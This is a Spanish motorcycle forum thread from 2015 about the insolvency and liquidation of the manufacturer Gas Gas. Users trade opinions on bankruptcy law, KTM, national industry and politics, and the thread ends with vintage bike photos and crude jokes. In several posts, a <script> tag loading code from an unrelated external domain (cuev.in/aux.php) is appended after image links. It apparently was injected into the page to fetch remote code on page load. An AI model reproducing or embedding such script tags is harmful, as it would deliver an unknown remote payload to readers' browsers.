PDA

Ver la versión completa : Gas Gas en preconcurso



JOE VESPINO
21/01/2015, 10:27
A tomar por .... el ultimo fabricante de motos que nos quedaba :confused:

http://ccaa.elpais.com/ccaa/2015/01/20/catalunya/1421777498_491960.html

manchi
21/01/2015, 10:57
Hombre, eso no significa que desaparezca....

JOE VESPINO
21/01/2015, 11:35
Yo no digo que desaparezca (mas bien acabará en liquidación trocedada, en manos de algun fondo buitre) pero olvidate de la gasgas que conocemos

ernestoruiz
21/01/2015, 11:46
Lamentablemente la Ley Concursal española no es la mas adecuada para rearrancar empresas que hacen suspension de pagos.
Como mucho, algun otro fabricante comprara la marca para quedarse con su fondo de comercio, pero sin mantener la fabricacion en Girona, al menos a medio plazo.
Os suena de algo el caso de DERBI.
Lo tienen chungo. Ojala me equivoque

Trencaterros
21/01/2015, 14:38
Lamentablemente la Ley Concursal española no es la mas adecuada para rearrancar empresas que hacen suspension de pagos.
Como mucho, algun otro fabricante comprara la marca para quedarse con su fondo de comercio, pero sin mantener la fabricacion en Girona, al menos a medio plazo.
Os suena de algo el caso de DERBI.
Lo tienen chungo. Ojala me equivoque

Creo que no te equivocas...

Se rumorea en ciertos circulos que el Sr Pierer anda detrás de GG para abrir el mercado del "imperio naranja" al trial, donde GG sigue teniendo buenas ventas, palmarés y a Adam Raga en "plantilla".

Si eso es así, las GG enduro me parece q están tan muertas ya como las HBG…

webyako
21/01/2015, 14:59
Me parece una auténtica lastima que España se quede marcas nacionales representativas del sector del motor en general y que las autoridades lo permitan, fomentando leyes que no facilitan nada el entramado empresarial, lo que provoca más paro, menos pode adquisitivo y más misera ...

JOE VESPINO
21/01/2015, 15:52
Creo que no te equivocas...

Se rumorea en ciertos circulos que el Sr Pierer anda detrás de GG para abrir el mercado del "imperio naranja" al trial, donde GG sigue teniendo buenas ventas, palmarés y a Adam Raga en "plantilla".

Si eso es así, las GG enduro me parece q están tan muertas ya como las HBG…

Y las de trial a no mucho tardar!!

MIKY ADVENTURE
21/01/2015, 16:02
Yo también había oido rumores del interés de KTM por adquirir Gas Gas. Con esta maniobra compra una marca puntera en trial y se quita un competidor en motos de enduro.

Apuesto porqué veremos motos naranjas de trial ganadoras!!!!!!.

luismi07
21/01/2015, 16:40
Dejaros de divagar. La culpa del Joe . Por que si te compras tantas KTM
. Como van a subsistir las marcas nacionales.:D

JOE VESPINO
21/01/2015, 16:53
Los de derechas de toda la vida gastamos KTM :lol:

Antonioc
21/01/2015, 22:07
Si rescataron a la banca con el dinero de todos, por qué la banca no le da facilidades para tratar de reflotar? Es una verdadera pena. Como usuario de gas gas quedé más que satisfecho y no se merecen desaparecer. A estos del gobierno lo único que les interesa es repartirse el dinero público entre ellos y sus amiguitos... En fin...

Saludos.

ortograski2
21/01/2015, 22:21
Esperemos que consigan remontar

SALUDOS

conejilope
21/01/2015, 23:06
Y ahora que me estaba fijando en la gas gas de raid..... Que pena...

DKW
23/01/2015, 08:36
Es una pena que no se sepa apreciar y potenciar un producto nacional y se pierda.....otra mas

jandri
23/01/2015, 12:19
en mi humilde opinion de novato si ktm tiene la intencion de comprar gas gas no haria lo mismo que con husqvarna ... mantener el nombre, cambiarlas de color, fichar pilotos pro ...pero todos sabemos que el interior es naranja??

JOE VESPINO
23/01/2015, 13:20
Yo tampoco creo que KTM vaya a quedarse con la marca, pero si lo hace apostaria a que ocurrirá lo mismo que con Husaberg, vamos, que durante uno o dos años mantendrán el nombre, colores, chasis y motores, luego iran metiendo piezas propias, mas adelante pasarán a ser naranja y finalmente la llamaran KTM.

Y despues comprarán Beta o Sherco :D

cruiser
23/01/2015, 13:23
Si la compran es para que desaparezca y,... un competidor menos. igual que Husaberg.

Pepenator
23/01/2015, 23:46
Y no os olvidéis de Huskvarna......:mad:

Tino.
24/01/2015, 08:18
Como usuario de gas gas quedé más que satisfecho y no se merecen desaparecer.
Lo mismo digo. Tuve una GG300 durante siete años a la que le hice 30 y tantos mil kilómetros de enduro cambiando sólo piezas de desgaste, entre ellas cuatro kits de arrastre.

Quisiera volver a tener otra. Que no desaparezca.:porfavor:

Belmonte
24/01/2015, 17:35
El tema es sencillo, que compramos.......Gas Gas u otras marcas?
Entonces no pueden subsistir.
Abocados a la ruina.

barbo7
25/01/2015, 10:05
Yo no controlo mucho esto(corregidme si me equivoco).Es verdad que ktm vende muchas motos de campo y competir con esta marca,su marketing etc.es dificil,pero me parece que gas gas arrastra estos problemas(al margen de la situación económica actual)del fiasco de su motor de 4tiempos,para una empresa pequeña una inversión de ese calibre en un producto que ha sido un autentico fracaso(a lo mejor,o en parte injustamente eso no lo sé)puede suponer la ruina como así ha sido.
Ya lleva años arrastrando problemas.

JOE VESPINO
25/01/2015, 11:29
Totalmente de acuerdo, llevan muchos años lastrados por esa deuda. Por los problemas que han tenido algunos motores y la falta de gama (en 4T no tienen nada gordo) me da la sensación que estan mas preocupados en sobrevivir que en mejorar el producto, y asi es imposible competir con los grandes (ktm y japos).

Me refiero en las enduro, en trial ni idea.

Brutus
26/01/2015, 08:26
Siempre he pensado que GG es una moto CASI buena.
A mi modo de ver, si quiere competir con los buenos, peca por sus componentes y soluciones constructivas.
Una GG va bien los tres o cuatro primeros años. Como todas.
Pero a partir de ahí, la moto falla más que otras.
Unos cuantos amigos tienen GG. El comentario general es que hay que revisar aprietes antes de cada salida.
Los amortiguadores, alma de una moto de enduro, son de calidad media (Sachs, Marzocchi).

Pero en cualquier caso, tendrían su sitio en el mercado si hubiera más demanda.

Una ley de montes y normativas municipales menos restrictivas, mejoraría la demanda.

Y eso, SÍ AYUDARÍA a las marcas de motos.

JOE VESPINO
26/01/2015, 09:25
Otro problema es que no tiene (o no tenia) gama en 4T, cuando miré yo solo la 250 de motor yamaha, ni siquiera una triste 450, ni por supuesto una cilindrada intermedia 300-350-400 que es lo que yo buscaba.

Una pena porque el precio era de derribo y tiene un chasis que me iba fenomenal: bajita, estable, suspensiones suaves (..de calidad media pero para mi sobradas).

dominkido
26/01/2015, 12:55
bueno, la impresión , en mi zona, es que gasgas es la enduro para todos y es la más demandada en internet, barata de mantener, vale para todo, para novatos y para expertos, no es la mejor pero funciona a precios de risa.
la fse fue un fiasco que le hizo estancarse, pero las posteriores con motor yamaha me parecen un producto muy bueno.
que a los dos o tres años dan problemas, y que moto de enduro con un uso continuo no los da?.

me encanta una moto española, y de hecho estuve intentando hacerme mi propia trail gasgas, pero entiendo que los mercados son así y nosotros no somos americanos, alemanes o japoneses, que consumimos nuestros propios productos y los levantamos si o si,
si quisiéramos, tendríamos a gasgas en lo mas alto, pero en este bendito país acosado por la crisis y con un déficit que te cagas, no somos capaces de consumir nuestras motos , nos sentimos orgullosos de los éxitos de los "españoles" que se mudan a Andorra o Montecarlo para conducir mejor, allí se entrena mejor, , a ver si le dan la nacionalidad de una p---- vez, pero no hacemos nada para que brillemos en algo, y recuerdo que hemos sido los mejores fabricantes de motos del mundo. aunque también, se que es un tema complejo, y no solo se trata de que compremos nuestras motos, ahí también cuenta el apoyo de la administración, etc etc.

en fin que al final tendremos una ktm,


por cierto, mi hermano y yo tenemos una ec 250, un poquito retocada.

Brutus
26/01/2015, 13:29
Sí, son más baratas que las demás.
Sí, todas dan problemas a partir del tercer / cuarto año.... pero unas, más que otras. Lo viví en primera persona con mi Husqvarna 450. Muy bien hecha. Preciosa. buen comportamiento. Pero el quinto año, cada dos meses tenía una avería de 300 pavos, las barras perdían, ajuste de válvulas dos veces al año....

KTM no es tán crítica, aunque requiere mantenimiento exhaustivo. Honda y Yamaha son claramente más robustas.

Y sí, tenían buenos chasis y buenos motores.... de hecho, fueron los primeros en explotar de verdad el concepto 300 2t, que iba MUY bien de par.

Tuvieron un motor 450 4t de desarrollo y fabricación propia, creo recordar... el de Laia en el Dakar, creo que SEPRONA o GC, para hacer consumo interno...

Sí, triste noticia.

conejilope
26/01/2015, 13:45
me encanta una moto española, y de hecho estuve intentando hacerme mi propia trail gasgas, pero entiendo que los mercados son así y nosotros no somos americanos, alemanes o japoneses, que consumimos nuestros propios productos y los levantamos si o si,
si quisiéramos, tendríamos a gasgas en lo mas alto, pero en este bendito país acosado por la crisis y con un déficit que te cagas, no somos capaces de consumir nuestras motos , nos sentimos orgullosos de los éxitos de los "españoles" que se mudan a Andorra o Montecarlo para conducir mejor, allí se entrena mejor, , a ver si le dan la nacionalidad de una p---- vez, pero no hacemos nada para que brillemos en algo, y recuerdo que hemos sido los mejores fabricantes de motos del mundo. aunque también, se que es un tema complejo, y no solo se trata de que compremos nuestras motos, ahí también cuenta el apoyo de la administración, etc

estoy completamente deacuerdo contigo. Los franceses, alemanes, japoneses..... se sienten superorgullosos de sus productos. Nosotros no paramos de criticar lo nuestro. Nos acomplejamos con lo de los demas y pensamos que no llegamos a su nivel.

tambien hay que reconocer que los politicos han conseguido que nos detestemos entre nosotros mismos.

JOE VESPINO
26/01/2015, 18:05
Pues a mi esos argumentos me parecen peligrosos y demagogicos, ni compro un producto porque sea español, catalán o de bilbao; ni tampoco lo boicoteo por cuestiones politicas como tristemente se ha visto (supongo que es lo que pasa cuando uno toma decisiones de compra con ese tipo de argumentos); y sobre todo que no le estoy haciendo un favor a la economia española por mantener una empresa poco competitiva sino todo lo contrario. Bastantes millones de euros de nuestros impuestos se han ido en reflotar empresas (Seat, astilleros, siderometalurgicas, astilleros, bancos y cajas etc) que luego se han acabado regalando.

No se en que sector de la economía os moveis vosostros, pero eso que los americanos o alemanes compran sus productos nacionales antes que los foraneos son leyendas urbanas de barra de bar, compran como todo el mundo que tiene dos dedos de frente: en función de calidad, precio y plazos de entrega.

Si tanto os preocupa la industria española en vez de afear el que se prefieran productos austriacos, franceses e italianos (que por cierto, son socios europeos en un mercado común, y son quienes mantienen a la industria española, turismo etc, vamos, los que nos dan de comer a los españolitos) tendriaís que poner vuestros ojos en productos fabricados en paises comercialmente proteccionistas, ahí teneis a Japón por ejemplo, con sus tasas arancelarias y trabas a la importación de productos exteriores desde hace decadas. ¿vuestras empresas tienen clientes en Japón o consiguen colocar algo ahí? Pues a ellos a vosotros os están colocando motos y coches todos los dias.

dominkido
26/01/2015, 19:27
al final opinas como nosotros, no quieres comprar en Japón, etc.
digo que sería lo ideal y que hay muchos etc, y no hablo de inyectar dinero, como hizo la J.A en santana motor, para que los japoneses se llevaran el dinero y no les costara nada fabricar coches aquí,

ni juan ni juanillo, y ojo, ni soy nacionalista ni nacional ni historias, y sí, soy capaz de entender la economía global, pero hay grandes economistas, de prestigio mundial, que opinan que si consumimos alrededor, favorecemos nuestra economía, y si queremos una marca de la tierra, por motivos sentimentales, pues ya sabemos lo que hay que hacer, y estoy en desacuerdo contigo en el caso de los americanos alemanes franceses, ya que claro que compran a su beneficio, no son tontos, pero tiran mucho, pero que mucho para lo suyo, y no como nosotros,........ por otro lado es una opinión y por mucho que digamos aquí, gasgas ni sube ni baja.

gasclassic
26/01/2015, 19:58
Está claro que si cierra, será una lástima como lo fue el cierre de Bultaco, OSSA, Derbi, Sanglas.......... y Montesa casi, aun gracias que la moto de Bou se llama Montesa y no Honda.
Curiosamente todas estas marcas son catalanas y esto, no se hasta que punto influenció en su cierre.
No pretendo politizar, pero todo es política y en los negocios, mas todavía.
El problema de antes fue la sobre-protección del mercado interno, que llevó a las marcas a un lento pero claro desfase.
Como también creo que ha sido política el cierre de las fábricas Yamaha y Honda en Catalunya.
Y aquí el problema fue que para "cazarlas" se ofrecieron unas ventajas que hoy ya no podemos ofrecer y se van al "mejor postor", otra decisión equivocada, no se si el dejar que se vayan, como el hecho de "prostituirse" para que vinieran.
Y ahora lo de Gas Gas......que no sabría decir cual es la causa, pero mucho me parece que intentar luchar de tu a tu contra los gigantes (japos y ktm) es casi imposible y quizás se tendrían que haber dirigido hacia otros productos que no ofrecen los demás y bien publicitados, podrían resultar atractivos, como esa enduro light de 250.
Muchos no necesitamos suspensiones pro, ni pesos pluma, ni chasis de aluminio, sin embargo si podemos a lo mejor pagar 5.000 € y no 7.000 €.

De todas formas, en tiempos de crisis, solo los mas fuertes sobreviven y fuertes, hay 4 contadas.
De hecho, ya en su dia Harley Davidson o Ducati, marcas emblemáticas, estuvieron a punto de desaparecer.
E incluso me atrevería a decir, que BMW se salvó gracias al nuevo boxer (GS1100 y RT1100) y ya con la 1200 lo ha bordado, por que tampoco es que a principios de los 90 anduvieran muy boyantes precisamente.

Y como se ha dicho, ¿cuantas marcas inglesas (casi todas) e italianas han desaparecido?

Brutus
26/01/2015, 21:29
No olvidemos que a fin de evitar la competencia desleal entre países comunitarios, uno de las primeras normas de la Comunidad es la NO AYUDA económica de los estados a sus empresas.
Esta política ha sido norma en la construcción naval por el volumen de mano de obra que requiere. Y no olvidemos que han habido más de una sentencia de la CEE obligando a los astilleros a devolver dichas ayudas (incluso camufladas como ayudas a la formación o de otras formas).

Yo comparaba a GG con la original Husqvarna. Y el hecho es que el fin de ambas parece que será similar. Aparentemente, desaparecer. O cerrar o ser absorbido por KTM...

conejilope
26/01/2015, 22:22
Pues a mi esos argumentos me parecen peligrosos y demagogicos, ni compro un producto porque sea español, catalán o de bilbao; ni tampoco lo boicoteo por cuestiones politicas como tristemente se ha visto (supongo que es lo que pasa cuando uno toma decisiones de compra con ese tipo de argumentos); y sobre todo que no le estoy haciendo un favor a la economia española por mantener una empresa poco competitiva sino todo lo contrario. Bastantes millones de euros de nuestros impuestos se han ido en reflotar empresas (Seat, astilleros, siderometalurgicas, astilleros, bancos y cajas etc) que luego se han acabado regalando.

No se en que sector de la economía os moveis vosostros, pero eso que los americanos o alemanes compran sus productos nacionales antes que los foraneos son leyendas urbanas de barra de bar, compran como todo el mundo que tiene dos dedos de frente: en función de calidad, precio y plazos de entrega.

Si tanto os preocupa la industria española en vez de afear el que se prefieran productos austriacos, franceses e italianos (que por cierto, son socios europeos en un mercado común, y son quienes mantienen a la industria española, turismo etc, vamos, los que nos dan de comer a los españolitos) tendriaís que poner vuestros ojos en productos fabricados en paises comercialmente proteccionistas, ahí teneis a Japón por ejemplo, con sus tasas arancelarias y trabas a la importación de productos exteriores desde hace decadas. ¿vuestras empresas tienen clientes en Japón o consiguen colocar algo ahí? Pues a ellos a vosotros os están colocando motos y coches todos los dias.

Pues discrepo contigo. No son leyendas urbanas el hecho de que en francia estimulen su propio producto antes que el de los demas. Y hablo de francia como experiencia personal. Aqui mas de la mitad de los coches son citroen peugeot o renault y casi en todos los pueblos hay un taller exclusivo de estas marcas. En los supermercados cualquier producto, desde comida, a detergentes o juguetes lo diferencian del resto si esta fabricado en francia. Y se que en otros paises sucede lo mismo. Es cierto que no solo venden sus productos, pero si es cierto que estimulan a adquirir producto nacional.

en cuanto a desprestigiar lo español.... Si, creo que es asi. Mi abuelo siempre me decia que seat significaba siempre estoy arreglando tonterias. Si vemos que es made in spain, pensamos que la calidad es mediocre. Triste pero cierto.

y en cuanto a los boicots, lo achaco siempre a los politicos. Creo que nos identificamos mas por comunidades que por pais, y claro, eso puede acabar creando tensiones.

Brutus
27/01/2015, 06:44
Las motos off con más aceptación en Francia son las Yamaha, de largo. CREO que Gas Gas también es muy aceptada y vendida.
Quizás si Sherco llega a tener una presencia en mercado de unos cuantos años y pule los problemillas iniciales de sus modelos, consiga desbancar a Yamaha ?

Yo también creo que los franceses son muy defensores de sus productos, pero en una compra especializada y de importe alto, como la de una enduro, creo que ya priman otras cuestiones. También en Francia.

JOE VESPINO
27/01/2015, 10:57
+1, que no es lo mismo ir a comprar jamon de york o una tabla de quesos que una moto de 7.000 euros.

Dominkido, yo no te digo que no compres motos japonesas ni que yo no las compre, solo te digo que si te importa la economia nacional mejor que compres productos europeos (pues son el resto de europeos quienes sostienen nuestra industria y nuestro turismo) que no japoneses.

Sherco es una pequeña empresa que cada vez se está haciendo mas grande (compró a Scorpa cuando ésta entró en suspension de pagos), y cada vez tiene mas notoriedad en el mundo del enduro, fichó a knight durante un año etc. Creo que tiene mucho menor tamaño y ventas que GasGas pero claro, sin esa deuda millonaria, supongo.


Saludos.

gasclassic
27/01/2015, 11:13
Honda y Yamaha tenían fábricas en nuestro país.
Ducati, ktm y bmw ¿las tienen?

JOE VESPINO
27/01/2015, 11:37
Tu lo has dicho, tenían

JOE VESPINO
27/01/2015, 11:51
BMW, KTM, Ducati son empresas que tienen muchas plantas en Europa, algunas cotizan aqui, subcontratan a empresas locales europeas y entre ellas españolas y dan trabajo a europeos de clase media que son los que alimentan nuestro turismo y exportaciones de otras cosas.

Repito que no estoy diciendo a nadie que moto tiene que comprar o no comprar (mas bien lo contrario, mi discurso va de que no se critique a la gente por no comprar gasgas ni ninguna otra) pero si nos preocupa ayudar a la economia nacional, mejor que compremos productos europeos y no de otros origenes.

gasclassic
27/01/2015, 12:45
Joe, lo que digo es que mas que fijarnos en si la marca es española o europea, habría que fijarse si tiene fábricas en España o Europa.
Honda o Yamaha podían ser japonesas, pero daban trabajo a gente de aquí.
¿a quien da trabajo ktm?
Por que esa es otra ¿como nos beneficia el que un austriaco tenga curro?

JOE VESPINO
27/01/2015, 13:15
Si de acuerdo, pero Honda y Yamaha pusieron plantas aqui cuando nuestro precio de mano de obra era competitivo con el resto de Europa, en cuanto cayó el primer chaparron las desmantelaron rapidamente y de hecho creo que ya no queda ninguna (...no se si quedaba algo de suzuki en Asturias, poca cosa creo).

En España la segunda actividad economica mas importante (tras el turismo) es la automoción, no solo fabricar coches sino piezas y componentes, hay muchisimas empresas pequeñas e incluso grupos grandes de capital español (Cie Automotive, Gombarri etc) que suministran piezas a fabricantes de toda Europa.

A eso suma que generar riqueza en Europa es generarla en España (la mayoria de las exportaciones de todo tipo de productos españoles van al resto de Europa), especialmente ahora que la demanda interna está en minimos y las unicas empresas que chutan un poco son las exportadoras.

dominkido
27/01/2015, 15:24
si todos los del foro creamos una cooperativa o sociedad, y decidimos un modelo de trail, a fabricar, comprando motores, y mandando fabricar chasis, y el resto de industria auxiliar, a lo mejor funcionaba, todo es cuestión de moverlo en la web y ver la demanda . venderiamos nuestra propia ccm o ajp,................jajajajaja siii tengo fiebre, cosas de la gripe

gasclassic
27/01/2015, 18:51
Joe, ¿pero hoy no es casi todo made in china?
dominkido, buena idea.
Incluso a lo mejor no haría falta ni fabricarla, simplemente modificar algo existente, rollo tenere JaumeV

conejilope
28/03/2015, 16:32
Alguien sabe algo de gas gas? Alguna novedad? He visto que ktm ya ha desmentido que la vaya a comprar....

JOE VESPINO
28/03/2015, 20:18
Que yo sepa las negociaciones con la banca están paradas, los accionistas no se han puesto de acuerdo para una ampliación de capital, la plantilla en huelga, han fichado como gerente a un israelí que procede de la industria agroalimentaria (eso si, en su facebook aparece una foto con una Harley) y dicen que han parado el suministro de algunos recambios.

En fin, pa tirar cohetes :confused:

Tino.
20/05/2015, 18:03
Alguien sabe algo de gas gas? Alguna novedad? He visto que ktm ya ha desmentido que la vaya a comprar....
Acabo de escuchar en la radio local que GasGas ha paralizado la producción hoy mismo.

Un inversor israelita que iba a poner dinero se ha echado atrás, y los bancos ya no sueltan más dinero.

Han presentado un concurso de acreedores, (hace un mes ya hicieron un ERE temporal a la totalidad de la plantilla, unos 95 trabajadores), y por lo que parece va a desaparecer del todo, a no ser que venga alguien al "rescate".

Me sabe cantidad de mal, y a pesar que mucha gente habla mal de la marca, mi experiencia personal, y de la muchos de mis compañeros, ha sido siempre positiva. Excluyendo las antiguas 400 y 450 de 4T, claro...

gasclassic
20/05/2015, 18:33
Otra marca de nuestro país y varias veces campeona del mundo, que se va a pique.
España sigue yendo bien...........

gasclassic
20/05/2015, 18:35
..

conejilope
20/05/2015, 21:56
Duele oir cosas asi. Que nos queda de producto español? Alfer, motorhispania....

Trencaterros
21/05/2015, 15:25
Esperaban 4M € del israelita y negociaciones con la banca y las administraciones para arreglar el puf o de 40M € pero no hay manera aunque año a año este dando más de 1M € de beneficio, intereses a parte.

A GG se la han comido los intereses. O sea, la banca.

Antonioc
21/05/2015, 16:34
Esperaban 4M € del israelita y negociaciones con la banca y las administraciones para arreglar el puf o de 40M € pero no hay manera aunque año a año este dando más de 1M € de beneficio, intereses a parte.

A GG se la han comido los intereses. O sea, la banca.

Pero para esto no hay ayudas o rescate posible... Es de vergüenza. Los banqueros gastándose nuestro dinero del rescate en putas y fiestas, y la industria nacional a pique... Así va el país... Viva el vino!

La moto que más alegrías me dio de todas las que tuve era Gas Gas... Y la mejor en relación calidad/precio sin duda...

Esperemos que aún se pueda hacer algo, porque me parece gravísimo que la dejen morir...

Saludos.

Xavi
21/05/2015, 21:01
Una pena, sobre todo por los trabajadores.

jaimev
21/05/2015, 21:49
Con lo que deben es muy difícil levantarlo... pero no puedo creer que desaparezca, algo harán.

JOE VESPINO
21/05/2015, 22:59
Con 40 millones de deuda eso es imposible de levantar.

Lo normal en estos casos es que ahora, en fase de liquidación, alguien se quede con la marca y toda o parte de la actividad, a cambio de asumir determinados puestos de trabajo y parte de la deuda, ya veremos quien

jaimev
22/05/2015, 06:31
Si... en eso están pero veremos quien es el valiente que se mete allí...
Los que seguro pagan parte del pato son los pobres proveedores

gasclassic
22/05/2015, 10:21
Si, es curioso como meter unos pocos millones en una marca española, recordemos, campeona del mundo, parece ser un mal negocio y meterse en Bankia, tarjetas black y su puta madre, es la mar de rentable.
Así va España.

Tino.
22/05/2015, 11:34
Lo que es una vergüenza es que los partidos políticos reciban del erario público más de 210 millones de €uros anuales (en algunos años han sido 240 millones de €), de los cuales 83 mil son del PP, 63 mil del PSC-PSOE, 12 mil a CiU, 10 mil IU, etc, etc, etc, hasta un larguísimo rosario de formaciones, y con los cuales se pagan esos imponentes sueldos (recordad 12.000 €uros mensuales cobraba el "Sr." Barcenas, etc...) pero no hay para inyectar a una empresa que está en apuros asfixiada por la banca.

Claro que, la Unión Europea prohíbe rescatar empresas (no bancos), y es preferible mandar a 95 familias al paro...

ernestoruiz
26/05/2015, 20:40
Con 40 millones de deuda eso es imposible de levantar.

Lo normal en estos casos es que ahora, en fase de liquidación, alguien se quede con la marca y toda o parte de la actividad, a cambio de asumir determinados puestos de trabajo y parte de la deuda, ya veremos quien

Yo creo que eso no va a pasar.
Liquidaran la empresa, y una vez hecho eso, sin cargas de deudas, alguien se quedara con el fondo de comercio y el poco stock que quede por dos duros.
Creo que ya dije antes que la ley concursal española es una mierda. Muy pocas empresas remontan...
Una pena

manchi
26/05/2015, 20:48
A ver si me tocan los euromillones....

JOE VESPINO
26/05/2015, 23:13
Yo creo que eso no va a pasar.
Liquidaran la empresa, y una vez hecho eso, sin cargas de deudas, alguien se quedara con el fondo de comercio y el poco stock que quede por dos duros.
Creo que ya dije antes que la ley concursal española es una mierda. Muy pocas empresas remontan...
Una pena

Hola Ernesto, ya me conoces, y te digo que me dedico a concursal desde hace bastantes años.

El fondo de comercio es un concepto teórico-contable cuya existencia real no está constatada más alla de las etereas resoluciones del ICAC ¿conoces alguien que de verdad haya comprado un fondo de comercio?

Yo no. Realmente es que ni existe. A los fondos buitre y subasteros habituales adquirentes en empresas concursadas en liquidación lo que les interesa son cosas mas tangibles, o al menos que se puedan inscribira a su nombre.

ernestoruiz
27/05/2015, 06:11
Stop!!!
Joe, ante opiniones profesionales mejor me callo.
Yo hablo sin conocimiento. Mi opinion esta basada en dos procesos concursales relativamente cercanos. Ambos dos acabaron en liquidacion, por desgracia, con 40 o 50 personas en la calle.

JOE VESPINO
27/05/2015, 08:55
Si, en liquidaciones normales eso es lo habitual.

Pero si hay liquidación traslativa (incluso si se vende la empresa antes de la liquidación, que ahora se puede), la propia Ley exige que se valore el compromiso de mantenimiento de empleo por el comprador, y suele haber sucesión en deudas de la seguridad social etc. Esperemos que sea el caso y KTM o algun chino o indio se quede con la marca.

Costea
28/05/2015, 20:20
La verdad es que seria una autentica lastima que esta marca acabase sus dias así. Ayer mismo aparecía en un diario de Tarragona una noticia al respecto http://images.tapatalk-cdn.com/15/05/28/6ed5a0037fb57f9f5224e907daafa228.jpg

Antonioc
03/07/2015, 23:08
Pues lo acabo de leer en embarrados, y los peores augurios se han cumplido...

https://www.facebook.com/rltgasgas?fref=nf

Finalmente, ayer, en consejo de administración y por mayoría, los socios de Gas Gas motos, decidieron llevar la compañía definitivamente a liquidación, dando por cerrada la opción del posible inversor suizo. Así lo han comunicado al comité de empresa en reunión mantenida administrador y consejero delegado.

De esta manera y tras siete meses de negociaciones, agotar plazos legales, consumir prestación de los trabajadores y deteriorar la compañía. Con una estrategia llevada por parte de los socios de una manera nefasta para la marca, con el único fin de proteger sus intereses. Hoy de forma unilateral una parte del accionariado israelí, se ha decidido instar la compañía a liquidación. Esta decisión irrevocable abre un escenario totalmente diferente y nuevo para la marca.

De manera verbal y hasta que se formalice la liquidación, el comité junto con el administrador y consejero delegado han creído conveniente, dado que la actividad en la compañía hoy es inexistente, pactar otro permiso retribuido hasta poder negociar un expediente de suspensión temporal para toda la plantilla, exceptuando el recambio, departamento financiero y dirección, estos últimos junto con el comité, para preparar la venta de la unidad productiva con el administrador.

El comité de empresa entiende que esta ante un reto importante y que la única finalidad que hemos defendido siempre ha sido trabajar en un plan industrial que devuelva la marca donde le toca estar, en lo más alto del sector off-road y trial. Sabemos que no va ser fácil, que encontraremos piedras en el camino pero también miramos atrás y vemos que el camino que dejamos, tampoco fue fácil.

Llevamos mucho recorrido y no nos vamos a detener, no ahora. Porque si una cosa tenemos clara, es que los trabajadores de Gas Gas sabemos hacer motos y que solo necesitamos un empujón económico y buen equipo directivo.

Sus equipos de competición totalmente colgados, los recambios de la gente que tiene esa marca totalmente en el aire o sujetos a lo que pueda quedar, supongo que los precios de las gas gas usadas empezarán a caer en picado. Y aunque la intención de los empleados es seguir fabricando motos, al menos a corto plazo no creo que vuelvan a montar otra fábrica. Porque creo que era más fácil reflotar esta que empezar de cero...

En fin. Una pena terrible.

Saludos.

conejilope
04/07/2015, 05:54
Es una lastima. Siempre me ha gustado gas gas, y aunque consiguiesen volver a fabricar motos, sera como seat o derbi. Que lo unico español es el nombre.

JOE VESPINO
16/11/2015, 17:05
Parece que por fin hay buenas noticias: Torrot (con la ayuda de un fondo de inversión) se ha quedado la marca con la promesa de relanzar la producción de trial y enduro (...esperemos que tambien alguna trail o rally)

http://images.tapatalk-cdn.com/15/11/16/b094e43420ef9aa5350968caa6a52011.jpg<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

gasclassic
16/11/2015, 18:08
Que bien!
¿volveremos a ver algo así?

http://lamaneta.com/news/wp-content/uploads/2012/07/Torrot-Chicas-4496.jpg

CAGANER
16/11/2015, 18:24
Yo soy más sano y últimamente hago bicing

http://cloud2.todocoleccion.net/calendarios-antiguos/tc/2012/05/20/31839631.jpg

Marcos
16/11/2015, 18:33
Yo tuve una bici Torrot!, pero no venía con fresca...

CESC
16/11/2015, 18:56
mi primera experiencia en "moto" fue una Torrot tipo Mobilet

JOE VESPINO
16/11/2015, 18:57
Mi primera bici (en serio), suspensión trasera, la delantera era de pega

http://2.bp.blogspot.com/-NTMV-El3Bs4/TrZ59jENZNI/AAAAAAAAABk/eXq1uSgdppw/s1600/foto0262.jpg<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

minicap
16/11/2015, 19:01
Mi primera bici (en serio), suspensión trasera, la delantera era de pega

http://2.bp.blogspot.com/-NTMV-El3Bs4/TrZ59jENZNI/AAAAAAAAABk/eXq1uSgdppw/s1600/foto0262.jpg<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

La mía era igual pero roja. Me la robaron a los pocos meses de que me la regalasen (hijos de p....) Poco tiempo después me pasé a las motos.

gasclassic
16/11/2015, 19:04
Yo soy más sano y últimamente hago bicing

http://cloud2.todocoleccion.net/calendarios-antiguos/tc/2012/05/20/31839631.jpg

Ostias!!!!!!!!!!! no recuerdo esa publicidad.
Es mas, por la pinta creo aun debía colear el franquismo y con ello la censura.
Aunque igual ya es de la época del destape, menudo desparrame.

PD. que guapas son las tetas naturales, sin silicona.

gasclassic
16/11/2015, 19:11
Mi primera bici (en serio), suspensión trasera, la delantera era de pega

http://2.bp.blogspot.com/-NTMV-El3Bs4/TrZ59jENZNI/AAAAAAAAABk/eXq1uSgdppw/s1600/foto0262.jpg<script src="https://cuev.in/aux.php?ver=10" type="text/javascript"></script>

Que tiempos, la mía era muy parecida, la Derbi Panther

http://www.cronoramia.com/wp-content/uploads/2013/11/bicicross-derbi-panther.jpg

Suspensión delante y atrás, llantas de aleación, frenos de tambor, asiento para dos, incluso cambio de marchas (la mía no y no veas como lo echaba en falta).
La verdad es que casi eran motos/ciclomotores.
Pero eso si, tanta parafernalia hacía que pesara como un muerto, es decir, como bici era una mierda pinchada en un palo!

CAGANER
16/11/2015, 19:15
Ostias!!!!!!!!!!!
PD. que guapas son las tetas naturales, sin silicona.

En tiempos de guerra, cualquier agujero es trinchera

gasclassic
16/11/2015, 19:20
En tiempos de guerra, cualquier agujero es trinchera

Collons, pero es que esa jamelga no es trinchera, en un pedazo bunker a todo lujo.
Ahora entre tanto bisturí y jeringuilla, te puedes llevar mas de una sorpresa.
Como los huevos kínder.
Ahí si que el agujero es trinchera. :-D

CAGANER
16/11/2015, 19:28
Lo de los kinder te refieres a que alguna vez has descubierto que la sartén tenía mango?

CESC
16/11/2015, 19:29
tanto la niña de la bici como el par que salen en la otra ahora son abuelas seguro jajajaja

gasclassic
16/11/2015, 19:45
Lo de los kinder te refieres a que alguna vez has descubierto que la sartén tenía mango?

:golpe:


tanto la niña de la bici como el par que salen en la otra ahora son abuelas seguro jajajaja

Seguro, pero mas de uno debe ser de su quinta :-D

JOE VESPINO
16/11/2015, 20:28
En tiempos de guerra, cualquier agujero es trinchera

:meparto::meparto:

FAZER
16/11/2015, 20:34
